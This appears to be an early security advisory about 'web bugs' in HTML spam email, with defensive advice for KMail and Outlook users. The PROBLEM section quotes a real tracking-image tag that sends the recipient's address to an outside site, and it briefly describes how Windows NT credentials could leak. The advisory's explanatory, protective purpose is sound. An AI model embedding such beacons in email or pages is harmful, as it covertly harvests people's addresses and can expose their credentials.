COMMAND

    HTML

SYSTEMS AFFECTED

    HTML

PROBLEM

    Alex Prestin found  following.  You  may have heard  of "web-bugs"
    before.   Or  you   may  not  have.    For  the  benefit  of   the
    less-experienced, here's what they are and what they do.

    "Web  bugs"  are  small,  1x1  (or  similar-sized) transparent GIF
    images which can be  used to track the  movement of a user  around
    the web.  About  1 in 10 sites  use them.  Their  effectiveness at
    this task  is somewhat  questionable, but  they can  be used  more
    effectively for a different task.

    Alex started  noticing something  very disturbing  in the  HTML in
    spam mails recently.   He started seeing  web bugs.   Below is  an
    example from a recent email:

        <img src="http://www.megahardcoresex.com/sites/XXXXXXXX0 (continued) 3b/sf03b08152001.gif?M=XXXXXXXXX&ID=wakko@bitey.net" width="1" height="1">

    See it?   A web  bug.   If I  opened this  mail in an HTML-capable
    browser, that  little image  would've popped  up and  You would've
    been none the wiser.   Your address would also have  been verified
    by the sender, and stored in a large database of valid recipients.

    And if you  were running WinNT  4 and that  referrer pointed to  a
    server  advertising  a  share,  NT  would  send  your username and
    password to try to  log you on without  your knowledge.  It  could
    be grabbed and sent back to your machine, logon, and the atttacker
    would have  all rights  to your  machince and  network that the ID
    you're using has.

SOLUTION

    This is a client  problem that needs to  be supported there.   For
    example, Kmail  - the  KDE Mailer  - has  a "download remote URLs"
    checkbox.  Simply turning that  off stops HTML mail messages  from
    having things like <img> tags being activated.

    Under Outlook, this isn't possible, but there are some things  you
    can do...

    In  Outlook,  you  can  use  Message  Rules  to  move  emails with
    "Content-Type: text/html;"/"Content-Type:  multipart/alternative;"
    to a  HTML folder.   This move  does not  'preview' the  mail, and
    links are  not parsed.   When you  get a  few html  mails in  your
    special folder,  just disable  the fw  client (preventing outbound
    connections) and view the mail.  If you get html mail  internally,
    you can allow that in to your Inbox with some more creative rules.